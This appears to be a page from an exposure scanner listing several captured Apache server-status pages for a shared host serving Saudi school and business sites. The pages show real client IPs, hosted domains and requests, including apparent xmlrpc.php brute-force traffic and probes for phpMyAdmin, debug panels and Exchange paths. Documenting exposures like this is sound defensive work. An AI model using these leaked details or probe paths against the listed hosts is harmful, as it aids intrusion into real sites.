      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 03:57:07 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 23 hours 52 minutes 18 seconds
      Server load: 0.46 0.43 0.42
      Total accesses: 306336 - Total Traffic: 40.4 GB - Total Duration: 303826334
      CPU Usage: u182.91 s19.71 cu1249.69 cs270.44 - 1% CPU load
      1.78 requests/sec - 245.7 kB/second - 138.2 kB/request - 991.807 ms/request
      21 requests currently being processed, 0 workers gracefully restarting, 229 idle workers
      ________K____K__________K__KW_________________________________K_
      _______K________K________________K_______________________K______
      ____K_____K_K______________K__________________K_______K___R_K___
      ________________C_______________K.........................______
      _________________K_.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1149340/78/1602_
      12.4026810116698750.02.45154.86
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/104/1257_
      12.501001026745910.01.82233.34
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/86/1333_
      12.481251037164110.02.76117.53
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/92/1296_
      12.4025417920230.02.92131.38
      213.180.203.95http/1.1albayan.edu.sa:443GET /imgweb/files38/%D8%AA%D9%83%D8%B1%D9%8A%D9%85%20%D8%B7%D8%
      
      0-1149340/91/1397_
      12.53488012623040.014.55227.55
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/71/1217_
      12.432257210613940.09.34176.85
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/85/1490_
      12.442119813014690.03.58174.27
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/82/1322_
      12.45185749360220.059.06235.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149341/82/1763K
      12.55217281390.825.00212.17
      172.69.22.72http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-1149340/124/1395_
      12.5186739042660.01.58249.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/76/1214_
      12.4223796211572030.09.16148.69
      54.36.148.36http/1.1daris.live:443GET /product/27 HTTP/1.1
      
      0-1149340/71/1602_
      12.451976913048690.00.91145.01
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/98/1376_
      12.54238914224160.02.01255.83
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149342/92/1452K
      12.55014442691.72.88175.51
      172.69.214.158http/1.1nidaa.ws:80GET /config.json HTTP/1.1
      
      0-1149340/83/1406_
      12.412476813854210.013.87120.65
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/72/1292_
      12.47148726527260.029.04263.92
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/72/1284_
      12.5261686430400.01.58235.02
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/88/1452_
      12.461721019736090.02.73261.71
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/109/1607_
      12.481371029363590.03.17199.40
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/64/1344_
      12.5335719418700.01.23132.87
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/69/1368_
      12.491127311176700.036.22139.61
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/133/1422_
      12.5510724170290.02.78199.38
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/84/1355_
      12.5173953633280.02.77155.92
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/83/1333_
      12.47162737679740.04.54194.29
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149341/78/1488K
      12.554268844066.62.09193.46
      172.70.80.143http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-1202080/89/1224_
      8.021587221879220.00.80235.73
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/69/1377_
      8.041447210498750.00.36244.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202081/109/1323K
      8.11116046890.81.18188.24
      172.69.23.144http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-1202080/50/1339W
      7.96009929120.01.90190.58
      162.158.166.162http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-1202080/93/1320_
      8.01180665943070.00.90162.59
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/55/1170_
      8.1019787832670.00.82187.98
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/42/1164_
      8.05122886279480.00.82144.38
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/38/1270_
      7.913338039100.08.59106.57
      170.64.181.26http/1.1
      
      1-1202080/51/1146_
      8.01193956904450.0
      Found on 2024-05-25 00:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140d44cfea0

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 03:57:06 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  1 day 23 hours 52 minutes 16 seconds
      Server load: 0.42 0.42 0.41
      Total accesses: 306320 - Total Traffic: 40.4 GB - Total Duration: 303825852
      CPU Usage: u182.85 s19.71 cu1249.69 cs270.44 - 1% CPU load
      1.78 requests/sec - 245.7 kB/second - 138.2 kB/request - 991.858 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 240 idle workers
      ________K_______________K_______________________________________
      _______K________________________________________________________
      __________K_K_________________________________K_______W___R_____
      ________________________________K.........................______
      __R________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1149340/78/1602_
      12.4026610116698750.02.45154.86
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/104/1257_
      12.50981026745910.01.82233.34
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/86/1333_
      12.481231037164110.02.76117.53
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/92/1296_
      12.4025217920230.02.92131.38
      213.180.203.95http/1.1albayan.edu.sa:443GET /imgweb/files38/%D8%AA%D9%83%D8%B1%D9%8A%D9%85%20%D8%B7%D8%
      
      0-1149340/91/1397_
      12.53468012623040.014.55227.55
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/71/1217_
      12.432237210613940.09.34176.85
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/85/1490_
      12.442099813014690.03.58174.27
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/82/1322_
      12.45183749360220.059.06235.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149341/82/1763K
      12.55017281390.825.00212.17
      172.69.22.72http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-1149340/124/1395_
      12.5184739042660.01.58249.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/76/1214_
      12.4223596211572030.09.16148.69
      54.36.148.36http/1.1daris.live:443GET /product/27 HTTP/1.1
      
      0-1149340/71/1602_
      12.451956913048690.00.91145.01
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/98/1376_
      12.54218914224160.02.01255.83
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/90/1450_
      12.39279734442630.02.88175.51
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/83/1406_
      12.412456813854210.013.87120.65
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/72/1292_
      12.47147726527260.029.04263.92
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/72/1284_
      12.5259686430400.01.58235.02
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/88/1452_
      12.461701019736090.02.73261.71
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/109/1607_
      12.481351029363590.03.17199.40
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/64/1344_
      12.5334719418700.01.23132.87
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/69/1368_
      12.491107311176700.036.22139.61
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/133/1422_
      12.559724170290.02.78199.38
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/84/1355_
      12.5171953633280.02.77155.92
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149340/83/1333_
      12.47160737679740.04.54194.29
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      0-1149341/78/1488K
      12.552268844066.62.09193.46
      172.70.80.143http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-1202080/89/1224_
      8.021567221879220.00.80235.73
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/69/1377_
      8.041427210498750.00.36244.50
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/108/1322_
      7.96275686046860.01.18188.24
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/50/1339_
      7.96272669929120.01.90190.58
      51.39.234.74http/1.1albayan.edu.sa:443GET /web/474.html2 HTTP/1.1
      
      1-1202080/93/1320_
      8.01178665943070.00.90162.59
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/55/1170_
      8.1017787832670.00.82187.98
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/42/1164_
      8.05120886279480.00.82144.38
      104.248.148.117http/1.1sulaimaniya.edu.sa:443POST //xmlrpc.php HTTP/1.1
      
      1-1202080/38/1270_
      7.913138039100.08.59106.57
      170.64.181.26http/1.1
      
      1-1202080/51/1146_
      8.01191956
      Found on 2024-05-25 00:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140d0e71228

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 03:11:43 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  23 hours 6 minutes 53 seconds
      Server load: 0.59 0.41 0.38
      Total accesses: 148641 - Total Traffic: 22.1 GB - Total Duration: 130098176
      CPU Usage: u62.14 s7.16 cu611.2 cs123.76 - .967% CPU load
      1.79 requests/sec - 278.8 kB/second - 156.1 kB/request - 875.251 ms/request
      24 requests currently being processed, 0 workers gracefully restarting, 76 idle workers
      _K_______K_______RK___KK_K____K_K______________KKKW__K___K____K_
      __________RKK_W__KK___W________K____............................
      ................................................................
      .................W..............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0223090/9/883_
      1.878023229945860.00.6686.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/1445/13%20-%20%D8%A7%D9%84%D8%B1%D9%88%D8%A8%D9%88%
      
      0-0223091/8/557K
      2.03012684970.854.87137.00
      162.158.62.165http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-0223090/9/685_
      1.8775138775868910.00.2268.75
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/7XbzcqLjpmlOOYOfIRlrXv
      
      0-0223090/7/636_
      1.8864221398480.00.1764.69
      185.133.181.27http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      0-0223090/8/611_
      1.8581284139350.011.29115.55
      185.133.181.27http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-0223090/14/571_
      1.973234678050.014.8580.80
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/6kr44KLGo1RB7ZVTLvQNPf
      
      0-0223090/7/792_
      1.877334860080.00.1052.98
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1716509430.07140398025512695312
      
      0-0223090/19/653_
      1.9730105404520.00.46101.45
      23.22.35.162http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=940 HTTP/1.1
      
      0-0223090/7/919_
      1.839533594130.00.05128.89
      66.249.64.37http/1.1alnwisher.com:443GET / HTTP/1.1
      
      0-0223091/5/643K
      2.022226986866.60.11122.41
      172.69.214.9http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0223090/8/460_
      1.87763308209256000.00.2597.15
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/2ItjUr1EFSfFWaFbZtbfvE
      
      0-0223090/10/718_
      1.973217099887490.09.8397.02
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-0223090/10/693_
      1.906111754223260.00.42106.98
      185.133.181.27http/1.1jawad.com.sa:443GET /jawad_catalog.pdf HTTP/1.1
      
      0-0223090/72/737_
      1.96326321720860.012.29107.39
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/PcmWGNYTNoLW6FibbP5Le9
      
      0-0223090/59/802_
      1.981925496250.00.0874.87
      185.133.181.27http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-0223090/7/555_
      1.915602703980.00.04108.73
      54.36.148.242http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=5&q=254&t=54.36.148.70&c=5 HTTP/
      
      0-0223090/22/659_
      2.01171483583550.011.00138.32
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/x4j8JXmTFqBFr2PBBlOxZX
      
      0-0223090/9/676R
      1.7716504117660.012.08135.17
      185.133.181.27http/1.1
      
      0-0223091/44/789K
      2.03015685950.90.08108.03
      162.158.62.126http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-0223090/8/538_
      2.011113114180.00.4141.17
      199.45.155.33http/1.13dvi.com:443GET / HTTP/1.1
      
      0-0223090/31/653_
      1.963233679090.01.6875.06
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/t999xk0bWcuyE5IoWKxc5e
      
      0-0223090/8/691_
      2.02121512670.00.11101.56
      162.158.159.93http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0223091/7/668K
      2.02111174310.88.9688.98
      162.158.154.52http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0223091/8/608K
      2.03012294380.89.6199.58
      172.70.230.42http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0223090/8/734_
      2.02632210780.08.5376.18
      52.70.240.171http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1585 HTTP/1.1
      
      1-0222041/9/624K
      1.740218571640.80.06141.33
      108.162.242.99http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      1-0222040/7/633_
      1.5781461686750.06.83130.77
      185.133.181.27http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      1-0222040/14/677_
      1.578824182920.00.44118.56
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/2ItjUr1EFSfFWaFbZtbfvE
      
      1-0222040/7/693_
      1.587927840650.00.14123.14
      185.133.181.27http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-0222040/8/688_
      1.569141383020.00.1181.46
      52.70.240.171http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1430 HTTP/1.1
      
      1-0222042/10/590K
      1.74015600721.70.16114.46
      162.158.154.251http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-0222040/20/661_
      1.635073943405550.03.5779.01
      185.133.181.27http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/wkF0NxOfDQYLn1pNQm2Myh
      
      1-0222041/8/689
      Found on 2024-05-24 00:11
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402c86a042

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 17:23:12 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  13 hours 18 minutes 22 seconds
      Server load: 0.48 0.39 0.41
      Total accesses: 89094 - Total Traffic: 9.9 GB - Total Duration: 49984451
      CPU Usage: u184.81 s29.49 cu208.54 cs39.23 - .965% CPU load
      1.86 requests/sec - 216.0 kB/second - 116.1 kB/request - 561.031 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 230 idle workers
      ______K____K_______K_______R_____________________C______________
      KK___________K__________K___________________________KK__________
      _K________K_______________K__K_____________________________K____
      W_______K___________________________K_K___________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/513/513_
      46.9621922021310.053.2253.22
      176.224.99.150http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/shad_tile.png HTTP
      
      0-0295290/333/333_
      47.047211100310.058.6158.61
      220.126.251.164http/1.1akg.sa:443GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
      
      0-0295290/450/450_
      47.0274503255390.051.2751.27
      52.167.144.194http/1.1jawad.com.sa:443GET /en HTTP/1.1
      
      0-0295290/345/345_
      46.9026282716790.020.3220.32
      50.60.47.2http/1.1zed.sa:443GET /menu/wp-content/uploads/2023/06/65-Zed-BrandGuideline-Apri
      
      0-0295290/370/370_
      46.9124713188600.047.4947.49
      204.101.161.19http/1.1zed.sa:80GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ve
      
      0-0295290/315/315_
      46.9224213745120.027.1627.16
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/jque
      
      0-0295291/482/482K
      47.061211942889.323.0723.07
      220.126.251.164http/1.1akg.sa:443GET /sqlmanager/index.php?lang=en HTTP/1.1
      
      0-0295290/315/315_
      46.8064648834240.040.4240.42
      220.126.251.164http/1.1
      
      0-0295290/477/477_
      47.00128792696320.055.3255.32
      172.70.203.130http/1.1qr.brunch.ws:443POST /foods/11 HTTP/1.1
      
      0-0295290/342/342_
      46.621381331715220.055.3055.30
      176.224.99.150http/1.1
      
      0-0295290/269/269_
      46.962227680764820.039.6639.66
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A7%D9%84%D8%B9%D8%B4%D8%B1%D8%A9%20%D8%A
      
      0-0295291/465/465K
      47.0542183907613.330.6030.60
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-0295290/406/406_
      46.912561584170.031.3731.37
      207.102.138.19http/1.1zed.sa:80GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP
      
      0-0295290/377/377_
      47.02420921730.033.9033.90
      220.126.251.164http/1.1akg.sa:80GET /MyAdmin/index.php?lang=en HTTP/1.1
      
      0-0295290/472/472_
      46.95226682843910.042.8242.82
      172.70.203.152http/1.1qr.brunch.ws:443GET / HTTP/1.1
      
      0-0295290/299/299_
      47.0330201804930.021.7421.74
      220.126.251.164http/1.1akg.sa:443GET /phpMyAdmin-5.2.0-all-languages/index.php?lang=en HTTP/1.1
      
      0-0295290/365/365_
      46.9224012068880.048.3648.36
      204.101.161.19http/1.1zed.sa:80GET /wp-content/plugins/mpc-massive/assets/js/mpc-vendor.min.js
      
      0-0295290/395/395_
      46.9818012866640.059.2559.25
      2.90.128.26http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-0295290/418/418_
      47.032129402650.054.3854.38
      220.126.251.164http/1.1akg.sa:443GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
      
      0-0295291/320/320K
      47.0601279710.815.5615.56
      172.70.111.108http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-0295290/370/370_
      46.9125512189890.038.4638.46
      204.101.161.19http/1.1zed.sa:80GET /wp-content/plugins/woocommerce/assets/js/frontend/woocomme
      
      0-0295290/358/358_
      46.991503927900.031.1231.12
      95.219.197.141http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-0295290/415/415_
      47.041329649410.024.8424.84
      220.126.251.164http/1.1akg.sa:443GET /mysql/web/index.php?lang=en HTTP/1.1
      
      0-0295290/382/382_
      46.9224321795410.031.0231.02
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/Scro
      
      0-0295290/384/384_
      46.9619601198170.026.4126.41
      54.36.148.135http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=770&t=54.36.150.85&c=5 HTTP/1
      
      1-0267870/24/427_
      5.51134318091270.03.6990.54
      87.121.69.52http/1.1php.we3dvi.com:80CONNECT google.com:443 HTTP/1.1
      
      1-0267870/44/266_
      5.51466451176190.01.5968.05
      94.16.112.22http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      1-0267870/29/410R
      5.433080668980.01.9937.90
      220.126.251.164http/1.1akg.sa:443
      
      1-0267870/39/409_
      5.4425114349090.04.6830.79
      204.101.161.19http/1.1zed.sa:80GET /wp-content/themes/gastrobar/assets/js/modules/plugins/jque
      
      1-0267870/19/399_
